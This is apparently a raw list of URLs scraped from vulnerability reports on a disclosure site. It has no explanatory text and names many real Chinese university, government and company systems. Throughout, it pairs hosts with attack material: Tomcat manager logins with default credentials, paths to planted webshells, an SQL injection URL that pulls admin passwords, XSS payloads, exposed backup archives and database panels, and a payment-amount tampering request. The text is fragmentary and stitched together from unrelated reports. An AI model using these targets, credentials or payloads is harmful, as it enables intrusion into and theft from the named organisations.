http://ecard.tyut.edu.cn/pages/manager/managerAddNManager.jsp太原理工大学 http://ecard.sdu.edu.cn/pages/manager/managerAddNManager.jsp山东大学 http://ecard.jxust.cn/pages/pages/manager/managerAddNManager.jsp http://teccard.suda.edu.cn/pages/manager/managerAddNManager.jsp http://xyk.nwu.edu.cn/pages/manager/managerAddNManager.jsp http://ykt.hebut.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.utsz.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.csu.edu.cn/pages/manager/managerAddNManager.jsp http://yktcx.njmu.edu.cn/pages/manager/managerAddNManager.jsp http://xyk.jlnu.edu.cn/pages/manager/managerAddNManager.jsp http://202.113.244.71/pages/manager/managerAddNManager.jsp http://ecard.sdwz.cn/pages/manager/managerAddNManager.jsp http://ecard.tust.edu.cn/pages/manager/managerAddNManager.jsp http://www.ecard.sdwu.edu.cn/pages/manager/managerAddNManager.jsp http://218.30.22.96/manage/heyue/yz.php http://60.6.223.142:1100/admin/protected/index.jsp http://v.253q.com:8008 http://y.viiall.com/ http://218.30.22.28:8080/ http://218.30.22.28:8080/phpinfo.php http://218.30.22.28:8080/WWW.rar http://sj.zhubajie.com/ http://www.birtronix.com/gsmrpanel/admin/admin.php http://bsfwt.12366.ha.cn/bsfwt/wsbsfwt/index.html km2.in/xss.swf http://drops.wooyun.org/papers/548 https://202.127.25.227/por/login_psw.csp http://114.80.226.221:8080/homepage/index.action http://hrm.longskysoft.com/homepage/index.action http://ehr.crownbio.com/365hrm/homepage/index.action http://112.65.227.157:8080/homepage/index.action http://gc.cscec8b.com.cn/Prj/index.htm http://www.zgjsj.gov.cn/zhuanti/news.php?typeid=3&page=2 http://www.zgjsj.gov.cn/zhuanti/newsshow.php?id=12 http://apt.178.com/ http://mall.jifentao.com/wwwroot.rar http://mall.jifentao.com/phpMyAdmin http://xuewei.bjmu.edu.cn/idl/idl/ftb.imagegallery.aspx http://121.33.246.167/idl30/idl/ftb.imagegallery.aspx http://202.115.72.1/idl/idl/ftb.imagegallery.aspx http://lib.qfnu.edu.cn:808/idl/ftb.imagegallery.aspx http://xwlw.zju.edu.cn/idl/idl/ftb.imagegallery.aspx http://papers.libmill.com/idl/ftb.imagegallery.aspx http://papers.libmill.com/idl/ftb.imagegallery.aspx http://202.194.153.155/idl/UpLoadimages/mathimages/;ys.asp;.jpg_math.jpg http://210.32.33.160/idl/Check/ftb.imagegallery.aspx http://210.27.181.210/Check/ftb.imagegallery.aspx http://202.194.153.155/idl/Check/ftb.imagegallery.aspx http://papers.libmill.com/Check/ftb.imagegallery.aspx http://xwlw.zju.edu.cn/idl/Check/ftb.imagegallery.aspx http://lib.qfnu.edu.cn:808/idl/Check/ftb.imagegallery.aspx http://202.115.72.1/idl/Check/ftb.imagegallery.aspx http://121.33.246.167/idl30/Check/ftb.imagegallery.aspx http://xuewei.bjmu.edu.cn/idl/Check/ftb.imagegallery.aspx http://xuewei.bjmu.edu.cn/idl/Check/ftb.imagegallery.aspx http://xuewei.bjmu.edu.cn/idl/UpLoadimages/mathimages/;ys.asp;.jpg_math.jpg http://www.actc.com.cn/Zh/SixtyExpert/Login.aspx http://zhlzh.mofcom.gov.cn/ http://zhlzh.mofcom.gov.cn/upload/2015/02/23/142469519993869.22789360632558.jsp http://61.237.239.144/ictrcp/ http://61.237.239.144/ictrcp/base/security/userinfo!login.action http://61.237.239.144/ictrcp/ http://www.qfdns.net/ http://www.nxjxbz.com/lyfk.asp http://www.nxzxzs.com/lyfk.asp http://www.nxjxbz.com/lyfk.asp http://www.ystnz88.com/lyfk.asp http://www.nxjxtfkt.com/lyfk.asp http://www.nxmscy.com/lyfk.asp http://www.nxjxtfkt.com/lyfk.asp http://astro.ustc.edu.cn/ http://astro.ustc.edu.cn/list.php?uid=40&fid=53 http://t.ci123.com/wooyun http://www.ztehotel.com/mobile/mhotelgen.aspx?id=ZTE001 url:http://m.7yw.cn/admin_7yw/Guestbook.aspx?Act=Audit&id=559 url:http://61.172.246.134:80/manager/html user:tomcat pass:tomcat http://mp.8228.cn/admin/index.jsp http://localhost/3gcms/index.php?s=guestbook http://angame.login.game.uc.cn/index.php url:http://124.207.3.40:80/manager/html user:admin pass:tomcat http://www.hnrc.gov.cn/request/worklstex.aspx?zylx=0101 http://202.201.152.23:8080/idl30/admin/ftb.imagegallery.aspx http://qhbfm.jiehr.com.cn/admin/ftb.imagegallery.aspx http://211.86.245.155/admin/ftb.imagegallery.aspx http://lib.uir.cn:808/idl/admin/ftb.imagegallery.aspx http://61.167.120.67:8080/IDLWEB//admin/ftb.imagegallery.aspx http://xwlw.zju.edu.cn/idl/admin/ftb.imagegallery.aspx http://202.119.248.241/idl30//admin/ftb.imagegallery.aspx http://210.27.181.210/admin/ftb.imagegallery.aspx http://xuewei.bjmu.edu.cn/idl/admin/ftb.imagegallery.aspx http://219.223.211.23//admin/ftb.imagegallery.aspx http://paper.smu.edu.cn:88/idl30//admin/ftb.imagegallery.aspx http://202.115.72.1/idl/admin/ftb.imagegallery.aspx http://papers.libmill.com/admin/ftb.imagegallery.aspx http://202.194.153.155//idl///admin/ftb.imagegallery.aspx http://202.201.152.23:8080/idl30/admin/ftb.imagegallery.aspx http://www.cnemc.cn/news/downLoad.jsp?filePath= http://www.cnemc.cn/news/downLoad.jsp?filePath=news/downLoad.jsp http://111.47.120.1:8081/adminAction!login.action url:http://59.46.220.116:80/manager/html user:admin pass:admin url:http://59.54.202.37:80/manager/html user:admin pass:admin url:http://125.94.215.96:80/manager/html user:admin pass:admin https://125.94.215.96/PVISManager/login.action http://www.ccwh.gov.cn/serv.php?class=1 url:http://oneniceapp.com/photo/index/b7f9e1a3cc*****7877bc86a9093c http://211.68.208.72/gmis_tjwgy/Byyxwgl/lxtgxxlradd.aspx http://gs.njfu.edu.cn/Gmis/Byyxwgl/lxtgxxlradd.aspx http://202.206.151.85:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://yjs.cdutcm.edu.cn:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://graduate.hnust.cn/Gmis/Byyxwgl/lxtgxxlradd.aspx http://202.203.225.17:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://218.75.27.177/Gmis/Byyxwgl/lxtgxxlradd.aspx http://yjsy.wmu.edu.cn:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://101.76.99.20/Gmis/Byyxwgl/lxtgxxlradd.aspx http://61.187.179.68:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx http://211.64.205.214/Gmis/Byyxwgl/lxtgxxlradd.aspx http://211.64.205.214/Gmis/Byyxwgl/lxtgxxlradd.aspx shell:http://211.64.205.214/Gmis/Byyxwgl/UploadFiles/1.aspx http://210.43.126.80:8080/Gmis/Byyxwgl/lxtgxxlradd.aspx shell:http://210.43.126.80:8080/Gmis/Byyxwgl/UploadFiles/1.aspx http://www.w-net.cn/wwwroot.zip http://202.116.161.3:8080/redir.php http://202.117.3.106:8088/redir.php http://124.160.64.114:11660/redir.php http://safe.zjnu.edu.cn/redir.php http://jczx.split.hdu.edu.cn/redir.php http://219.244.166.226:8080/redir.php http://202.116.161.3:8080/redir.php http://live.sports.ifeng.com/index.shtml http://www.xinli001.com/user/article/post/ http://ec.crcc.cn:8000/logonAction.do http://www.ncist.edu.cn/kexue/news/read.asp?id=826 http://www.hbwjyy.com/ http://www.hbwjyy.com/search.aspx?t=1&k=rgrg%27 www.zcom.com/shop/ www.zcom.com/_alias/configs/conn.inc.php http://yjsy.wzmc.edu.cn:8080/gmis/xjgl/changedsView.aspx http://yjsy.wmu.edu.cn:8080/gmis/xjgl/changedsView.aspx http://202.203.225.17:8080/Gmis/xjgl/changedsView.aspx http://211.64.205.214/gmis/xjgl/changedsView.aspx http://210.43.126.80:8080/Gmis/xjgl/changedsView.aspx http://101.76.99.20/Gmis/xjgl/changedsView.aspx http://61.187.179.68:8080/Gmis/xjgl/changedsView.aspx http://yjsy.wzmc.edu.cn:8080/gmis/xjgl/changedsView.aspx cn:8080 http://yjsy.wzmc.edu.cn:8080 http://lyczkj.gov.cn/cx/ http://lyczkj.gov.cn/cx/admin/login.asp http://202.114.177.191/gmis/zs/sczgscbinfoadd.aspx http://gs.njfu.edu.cn/gmis/zs/sczgscbInfoAdd.aspx http://202.206.151.85:8080/gmis/zs/sczgscbInfoAdd.aspx http://yjsy.wzmc.edu.cn:8080/gmis/zs/sczgscbInfoAdd.aspx http://218.75.27.177/gmis/zs/sczgscbInfoAdd.aspx http://202.114.177.191/gmis/zs/sczgscbInfoAdd.aspx http://yjsy.wmu.edu.cn:8080/gmis/zs/sczgscbInfoAdd.aspx http://yjs.cdutcm.edu.cn:8080/Gmis/zs/sczgscbInfoAdd.aspx http://yjs.hnu.cn/gmis/zs/sczgscbInfoAdd.aspx http://yjsc.hunnu.edu.cn/gmis/zs/sczgscbInfoAdd.aspx http://218.195.64.26:8080/gmis/zs/sczgscbInfoAdd.aspx http://211.64.205.214/gmis/zs/sczgscbInfoAdd.aspx http://211.64.205.214/gmis/zs/sczgscbInfoAdd.aspx http://211.64.205.214/gmis/ZS/uploadfiles/1.aspx http://218.195.64.26:8080/gmis/zs/sczgscbInfoAdd.aspx http://218.195.64.26:8080/gmis/ZS/uploadfiles/1.aspx www.taotiba.com cn:8000/logi/ http://logistics.auchan.com.cn:8000/manager/html http://member.aili.com/note_/note-228293 http://member.aili.com/note_/note-228293 http://www.bdnmg.com:8080/gps/mobile/index.html http://www.neoby.com/ http://www.neoby.com/ajax?action=Level&cmd=Get&storeid=5575 http://220.163.100.151:9002/Ajax.ashx?action=doLogin&loginName=1&password=1&noCache=0.03266645718449479 http://220.163.100.151:9002/ http://220.163.100.151:9002/ http://www.nongyou.com.cn/ http://61.133.119.187:8091/jwhxq.aspx?id= http://222.135.76.147:8200/jwhxq.aspx?id= http://222.135.127.190:7200/jwhxq.aspx?id= http://221.2.149.47:8200/jwhxq.aspx?id= http://218.59.205.41:8053/jwhxq.aspx?id= http://jwh.tanljgzx.gov.cn/jwhxq.aspx?id= http://221.2.171.59:8200/jwhxq.aspx?id= http://218.56.159.98:8001/jwhxq.aspx?id= http://123.134.189.60:8016/jwhxq.aspx?id= http://218.56.159.98:8001/jwhxq.aspx?id= url:http://106.39.52.30:80/manager/html user:admin pass:admin http://www.anlice.com/ceping/HouAdmin/GLGWUsers.aspx http://www.tobdclub.com/ceping/HouAdmin/GLGWUsers.aspx http://xt100.cn//ceping/HouAdmin/GLGWUsers.aspx http://www.china21nec.com/ceping/HouAdmin/GLGWUsers.aspx http://www.gzedu100.com/ceping/HouAdmin/GLGWUsers.aspx http://www.gzedu100.com/ceping/HouAdmin/GLGWUsers.aspx http://www.china21nec.com/ceping/HouAdmin/GLGWUsers.aspx http://fzedu.net.cn/ceping/fckeditor/editor/filemanager/connectors/test.html# http://www.8409409.com/ceping/fckeditor/editor/filemanager/connectors/test.html http://www.dghgjy.com//ceping/fckeditor/editor/filemanager/connectors/test.html http://xt100.cn/ceping/fckeditor/editor/filemanager/connectors/test.html http://www.tobdclub.com/ceping/fckeditor/editor/filemanager/connectors/test.html http://www.anlice.com//ceping/fckeditor/editor/filemanager/connectors/test.html http://xitong.mingjuan.net/ceping/fckeditor/editor/filemanager/connectors/test.html http://xitong.mingjuan.net/ceping/fckeditor/editor/filemanager/connectors/test.html http://xitong.mingjuan.net/ceping/Uploads/file/1.asp/ccc.jpg http://www.netistate.com/bbs/uc_server http://182.92.99.5:8080/index.action http://210.32.33.160/idl/Check/Check_login.aspx http://202.194.153.155/idl/Check/Check_login.aspx http://papers.libmill.com/Check/Check_login.aspx http://xwlw.zju.edu.cn/idl/Check/Check_login.aspx http://202.115.72.1/idl/Check/Check_login.aspx http://219.244.185.22/idl/Check/Check_login.aspx http://219.244.185.22 http://203.195.187.159:9090/ http://www.longmaster.com.cn/www.rar http://gamedb.766.com/sm/site/view/hero_id/1'注入点 http://www.realesoft.com/about/news/news_view.php?id=213 http://hxfc.qiwei.com/wxhtgl http://env.bnu.edu.cn/morenews.php?id=1 http://env.bnu.edu.cn/morenews.php?id=1 http://sqlmap.org http://cgdcwz.com/portalnew/user/login.action http://bk.gmw.cn/index.php?edition-compare-1 http://211.64.205.214///Gmis/xjgl/ptslist.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/xjgl/ptslist.aspx http://202.203.225.17:8080//Gmis/xjgl/ptslist.aspx http://yjsy.wmu.edu.cn:8080//Gmis/xjgl/ptslist.aspx http://210.43.126.80:8080/Gmis/xjgl/ptslist.aspx http://101.76.99.20//Gmis/xjgl/ptslist.aspx http://61.187.179.68:8080/Gmis/xjgl/ptslist.aspx http://218.75.27.177//Gmis/xjgl/ptslist.aspx http://218.75.27.177//Gmis/xjgl/ptslist.aspx http://218.75.27.177 http://www.strongsoft.net/DMenu.aspx http://shzh.wlfx.gov.cn http://218.86.6.48:3505 http://yj.yywater.gov.cn http://222.216.218.28:8088 http://219.159.102.99:8088 http://218.86.96.98:3505 http://111.12.51.221:8088 http://222.242.107.62:4000 http://fxb.lucheng.gov.cn http://183.233.205.85:9001 http://222.83.214.58:8088 http://219.159.239.96:8088 http://shzh.wlfx.gov.cn/report/ReportMain.aspx http://218.86.6.48:3505/report/ReportMain.aspx http://yj.yywater.gov.cn/report/ReportMain.aspx http://222.216.218.28:8088/report/ReportMain.aspx http://219.159.102.99:8088/report/ReportMain.aspx http://218.86.96.98:3505/report/ReportMain.aspx http://111.12.51.221:8088/report/ReportMain.aspx http://222.242.107.62:4000//report/ReportMain.aspx http://fxb.lucheng.gov.cn/report/ReportMain.aspx http://183.233.205.85:9001/report/ReportMain.aspx http://222.83.214.58:8088/report/ReportMain.aspx http://219.159.239.96:8088/report/ReportMain.aspx http://222.83.214.58:8088/report/AjaxHandle/StationChoose/StationTree.ashx?STTP=%27KKK%27,%27DD%27,%27DD_R%27,%27PP%27,%27RR%27,%27MM%27,%27ZQ%27,%27ZQ_R%27,%27RR_R%27,%27TT_R%27,%27TT%27&ADCD=&search=1&RadioType=Radio_QY&ReportID=Report11&_=1423816421920 http://www.hjsoft.com.cn/ http://www.hjsoft.com.cn/2525/1040/index.shtml www.njncc.com:8089/templates/index/hrlogon.jsp renshiguanli.sdflc.com/templates/index/hrlogon.jsp hr.bjn3cc.com/templates/index/hrlogon.jsp cn:8088/templates/index/hrlogon.jsp com:9999/templates/index/hrlogon.jsp ehr.shimaoco.com/templates/index/hrlogon.jsp hr.bmec.net/templates/templates/index/hrlogon.jsp hr.gxjgjt.com/templates/index/hrlogon.jsp ehr.hongkun.com.cn/templates/index/hrlogon.jsp www.cnbmehr.com:8080/templates/index/hrlogon.jsp cn:8585/templates/index/hrlogon.jsp ehr.topsearch.com.hk/templates/index/hrlogon.jsp intranet.topsearch.com.hk/templates/index/hrlogon.jsp cn:8089/templates/index/hrlogon.jsp http://sce.h3c.com/sce/shell.jsp http://www.wooyun.org/bugs/wooyun-2015-098206/trace/9d66279a2d19108acd5ebfed4218ffd0 http://cn.mall-builder.com http://220.248.229.53:28080/ http://www.wooyun.org/bugs/wooyun-2010-098215/trace/6747e9d513efe48d1368f9ede343dae3 http://cn.mall-builder.com/,我的账号:bklm2密码12345678 http://cn.mall-builder.com/shop.php?uid=965,成功弹窗~ http://www.wooyun.org/bugs/wooyun-2010-098221/trace/4913bbb4dc36be483f6b589bfc4faca9 http://cn.mall-builder.com/shop.php?uid=965,这里看到是弹窗弹不出的 http://www.airmacau.com.tw:8086/about/news_articles.asp?id=55 http://www.airmacau.com.tw:8086/holidays/hotel_detail.asp?route=mfm&seq=3 http://www.airmacau.com.tw/tips/tips_intro.asp?unqid=13 http://220.249.191.174/FjServer/fjserver/userAction!userLogin.action http://www.haowan123.com/ http://www.haowan123.com/index.php?r=service/index http://www.haowan123.com/index.php?r=service/index/account http://wap.caitiyu.com/ http://113.200.188.210:18888/NetHallSelfServiceSX/netHallSelfServiceKt.action http://www.jucclub.com/manage/login.asp http://www.jucclub.com/manage/login.asp http://www.gclsgsk.com/manage/desktop.asp http://www.jsyhgc.com/manage/login.asp http://www.lywmw.com/manage/login.asp http://nsjysz.com/manage/login.asp http://www.lyty88.com/manage/login.asp http://**.**.**/back.jsp url:http://www.kf.ha.stats.gov.cn:8081/cms/wcm/login.jsp http://www.zz185.com/list_new.asp?spe_id=292 http://www.zz185.com/news.asp?id=672 http://www.zz185.com/list_new.asp?spe_id=292为例测试: http://www.zz185.com/list_new.asp?spe_id=292 http://www.dadoubanzi.com/search/index.php?key=88952634&imageField=88952634&myord=uptime&myshownums=20存在注入,数据库泄露。 http://dealer.mercedes-benz.com.cn/admin/ http://www.hua.com/product/4050001.html http://www.hua.com/shopping/Success.asp?lq3_status=no&lq3_code=&lq3_sum=0&gmrid=9445886&order_amount=1&payment= http://www.hua.com/shopping/payment/alipaynew/alipayapi.asp?OrderID=9445886&OrderAmount=25 http://www.hua.com/shopping/payment/alipaynew/alipayapi.asp?OrderID=9445886&OrderAmount=1 http://www.js11183.com/ckplayer/ctvPlay.jsp?id=72 http://www.keruyun.com/customerCase.html https://github.com/flftfqwxf/keruyun https://github.com/silence52168/MyCodeSpace/blob/master/CalmRouter_pro/profiles/dev/config.properties http://t.hb.189.cn/ http://t.hb.189.cn/index.php?g=wap&token=fwbxug1420513501 http://www.hljmb.gov.cn/fujian/ http://www.hljmb.gov.cn/fujian/foo1__%b8%bd%bc%fe1.php http://epp.dell-brand.com http://epp.dell-brand.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23 http://bec.pigai.org/ http://bec.pigai.org/index.php?bmsg=111 http://think.lenovo.com.cn http://www.jishimedia.com/tplt/xl201106301142338.jsp?infoid=11132&cid=270 http://www.jishimedia.com/tplt/xl2011063011314194.jsp?infoid=13775&cid=949 http://211.68.208.72/gmis_tjwgy/jxsgl/fbrcxxedit.aspx?id=1 http://gs.njfu.edu.cn/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://202.206.151.85:8080/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://yjs.cdutcm.edu.cn:8080/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://graduate.hnust.cn/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://202.203.225.17:8080/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://218.75.27.177//Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://yjsy.wmu.edu.cn:8080/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://101.76.99.20////Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://61.187.179.68:8080////Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://yjsy.wzmc.edu.cn:8080/Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://210.43.126.80:8080//Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://211.64.205.214//Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://211.64.205.214//Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://210.43.126.80:8080//Gmis/jxsgl/fbrcxxedit.aspx?id=1 http://**.**.**/admin/passport/signin.shtml http://www.yohobuy.com/home/userpwd http://www.yohobuy.com/home/userpwd/modpwd http://www.yohobuy.com/home/userpwd/modpwd http://sz.bendibao.com/suggest/suggest.htm。 http://mercury.csair.com/cn/index.shtml http://www.csairholiday.com/ http://register.csairholiday.com/casUserManager/user/register.do?mhd=register可以登陆南航团购的页面http://www.4006695539.com/tuan/module/newgroupon/groupOnAction.do?mhd=productList这个页面 http://211.68.208.72/gmis_tjwgy/zs/fbzsjzInfoadd.aspx http://gs.njfu.edu.cn/Gmis/zs/fbzsjzInfoadd.aspx http://202.206.151.85:8080/Gmis/zs/fbzsjzInfoadd.aspx http://yjs.cdutcm.edu.cn:8080/Gmis/zs/fbzsjzInfoadd.aspx http://graduate.hnust.cn/Gmis/zs/fbzsjzInfoadd.aspx http://202.203.225.17:8080/Gmis/zs/fbzsjzInfoadd.aspx http://218.75.27.177//Gmis/zs/fbzsjzInfoadd.aspx http://yjsy.wmu.edu.cn:8080/Gmis/zs/fbzsjzInfoadd.aspx http://101.76.99.20////Gmis/zs/fbzsjzInfoadd.aspx http://61.187.179.68:8080////Gmis/zs/fbzsjzInfoadd.aspx http://yjsy.wzmc.edu.cn:8080/Gmis/zs/fbzsjzInfoadd.aspx http://210.43.126.80:8080//Gmis/zs/fbzsjzInfoadd.aspx http://211.64.205.214//Gmis/zs/fbzsjzInfoadd.aspx http://211.64.205.214//Gmis/zs/fbzsjzInfoadd.aspx http://211.64.205.214/Gmis/zs/uploadfiles/wooyun.aspx http://210.43.126.80:8080//Gmis/zs/fbzsjzInfoadd.aspx http://210.43.126.80:8080/Gmis/zs/uploadfiles/wooyun.aspx http://groupoa.tcl.com/tcl/Infor/InforManage.nsf?opendatabase help.u17.com/index.php?edition-compare-1 http://dev.56.com/wiki/edition-compare-101.html http://bbs.ifeng.com/talk/special/index.shtml a05:55PM http://office.zhongnangroup.cn http://www.cthhmu.com/news/shownews.php?id=2213&classid=26 http://wenda.pchouse.com.cn/geren/35264279 http://wenda.pchouse.com.cn/geren/35264279 http://canyin.3158.cn/pinlun/?id=1427&formid=hotshop http://202.198.141.46:8088/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://59.72.151.21:1100/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://sync.nefu.edu.cn/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://58.40.126.65/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://219.141.106.225/k3/list.aspx?key=123456&f_jb=8895263&f_cc=123456&f_year=123456 http://online.nefu.edu.cn/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://210.26.85.211/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://210.40.3.220/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://202.198.141.46:8088/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://gxzy.hnadl.cn/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://211.87.190.13:8888/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://sync.hnadl.cn/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://202.197.127.113/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://202.197.127.113/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://211.87.190.13:8888/k3/list.aspx?key=123456&f_jb=123456&f_cc=123456&f_year=123456 http://59.72.151.21:1100/k4/list.aspx?key=11111 http://58.40.126.65/k4/list.aspx?key=11111 http://202.198.141.46:8088/k4/list.aspx?key=11111 http://online.nefu.edu.cn//k4/list.aspx?key=11111 http://219.141.106.225//k4/list.aspx?key=11111 http://sync.nefu.edu.cn//k4/list.aspx?key=11111 http://sync.hnadl.cn//k4/list.aspx?key=11111 http://202.197.127.113//k4/list.aspx?key=11111 http://210.26.85.211//k4/list.aspx?key=11111 http://210.40.3.220//k4/list.aspx?key=11111 http://gxzy.hnadl.cn//k4/list.aspx?key=11111 http://211.87.190.13:8888//k4/list.aspx?key=11111 http://211.87.190.13:8888//k4/list.aspx?key=11111 http://210.40.3.220//k4/list.aspx?key=11111 http://www.dzsey.com/sywebeditor/upimg.asp http://www.dzsey.com/syWebEditor/dot4.asp http://www.suqianlawyer.com//sywebeditor/upimg.asp http://www.wybwy.com/sywebeditor/upimg.asp http://www.hhjw321.cn/sywebeditor/upimg.asp http://www.weiye666.com/sywebeditor/upimg.asp http://www.cctv78.cn/sywebeditor/upimg.asp http://www.holylight.com.cn/sywebeditor/upimg.asp http://www.zhubian88.cn/sywebeditor/upimg.asp url:http://www.dhac.com.cn/member/mainAction!queryMainInfo.action http://admin.noahedu.com/cms/user/login.action http://www.zqplan.gov.cn/ls/lvd_readnews.asp?id=1444 http://www.txwl.cn/ http://210.32.33.160/idl/Check/GetSubFileList.aspx?StuID=469 http://219.223.211.23/Check/GetSubFileList.aspx?StuID=469 http://xwlw.zju.edu.cn/idl/Check/GetSubFileList.aspx?StuID=469 http://210.27.181.210/Check/GetSubFileList.aspx?StuID=469 http://202.194.153.155/idl/Check/GetSubFileList.aspx?StuID=469 http://202.197.107.11:86/idl30/Check/GetSubFileList.aspx?StuID=469 http://202.115.72.1/idl/Check/GetSubFileList.aspx?StuID=469 http://xuewei.bjmu.edu.cn/idl/Check/GetSubFileList.aspx?StuID=469 http://lib.qfnu.edu.cn:808/idl/Check/GetSubFileList.aspx?StuID=469 http://202.115.72.1/idl/Check/GetSubFileList.aspx?StuID=469 http://202.112.181.252/idl/Check/GetSubFileList.aspx?StuID=469 http://202.112.181.252/idl/Check/GetSubFileList.aspx?StuID=469 http://210.32.33.160/idl/admin/admin_login.aspx http://219.223.211.23/admin/admin_login.aspx http://xwlw.zju.edu.cn/idl/admin/admin_login.aspx http://210.27.181.210/admin/admin_login.aspx http://202.194.153.155/idl/admin/admin_login.aspx http://202.197.107.11:86/idl30/admin/admin_login.aspx http://202.115.72.1/idl/admin/admin_login.aspx http://xuewei.bjmu.edu.cn/idl/admin/admin_login.aspx http://lib.qfnu.edu.cn:808/idl/admin/admin_login.aspx http://202.115.72.1/idl/admin/admin_login.aspx http://202.112.181.252/idl/admin/admin_login.aspx http://lib.uir.cn:808/idl/admin/admin_login.aspx http://202.112.181.252 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowBusiness.aspx?id= http://221.1.104.11:8011/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://221.2.171.59:8300/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://demo.inongyou.cn/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://rctdlz.cn/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://60.2.214.118:8088/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://121.17.2.52/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://61.186.154.210:8088/ExtWebModels/WebFront/ShowCompanyInfo.aspx?id= http://sz.fangdr.com/admin/index.jsp http://sz.fangdr.com/ http://cs.fangdr.com/ http://wh.fangdr.com/ http://dg.fangdr.com/ http://hz.fangdr.com/ http://pesoft.pesoft.org/frame/page/userLogin.aspx http://www.hbhc12333.gov.cn/hbwz/qtpage/hdjl/zxzx_ckhf.jsp?zxlb=01 http://www.henanrd.gov.cn/hnrd/article_content.jsp?TID=20111211145533421387043&ColumnID=105 http://www.henanrd.gov.cn/stdcommittee12.5/index.jsp?CId=421 http://www.henanrd.gov.cn/committee12.2/index.jsp?CId=428 http://112.80.248.138:8080/ http://112.80.248.138:8080/phpmyadmin/index.php http://192.168.2.99/detailbackhandler.php http://dg.uninx.com/dgpt/list.phpsearchword=&type=2&inpbrand=&inpguodaishang=4&inpjiage=&inpzhuping=&inpwangluolx=&inp4Gwangluo=&inp3Gwangluo=&inp2Gwangluo=&inpxitong=&inphexinshu=&inpshexiangtou=&inpSIMka=&inptedian= http://www.sjzszlxx.com/database/ password:20090904 http://www.sjzszlxx.com/ewebeditor/ http://www.sjzszlxx.com/ewebeditor/UploadFile/2015226131733143.asa http://**.**.**/cms/cms/webapp/research/research.zip http://shop.toone.com/index.php?a=index&g=Home&m=Product&product_type_id=3 http://218.21.240.34/admin/alluser/manager.php?unit=%CE%DA%BA%A3%CA%D0%B7%A2%B8%C4%CE%AF&class=%B5%A5%CE%BB%BC%F2%BD%E9&subclass=%D5%FE%CE%F1%B9%AB%BF%AA http://218.21.240.34/admin/alluser/manager.php?unit=%CE%DA%BA%A3%CA%D0%B7%A2%B8%C4%CE%AF&class=%B5%A5%CE%BB%BC%F2%BD%E9&subclass=%D5%FE%CE%F1%B9%AB%BF%AA http://218.21.240.34/admin/alluser/manager.php?unit=%CE%DA%BA%A3%CA%D0%B7%A2%B8%C4%CE%AF&class=%B5%A5%CE%BB%BC%F2%BD%E9&subclass=%D5%FE%CE%F1%B9%AB%BF%AA http://fgw.wuhai.gov.cn/bbs/?bbstype=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&id=10198 http://fgw.wuhai.gov.cn/readnews.php?subclass=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://kefu.9you.com/ http://kftools.9you.com/ http://idea.9you.com/ http://ekey.9you.com/ http://yjdq.9you.com/ http://02jam.9you.com/ http://9you.com/ http://albumupload.9you.com/ http://au.hk.9you.com/ http://au2.9you.com/ http://audition.9you.com/ http://avatar.9you.com/ http://baf.9you.com/ http://bbs3.9you.com/ http://bbs5.9you.com/ http://bbs6.9you.com/ http://clock.9you.com/ http://ddr.9you.com/ http://dnh.9you.com/ http://editnews.hk.9you.com/ 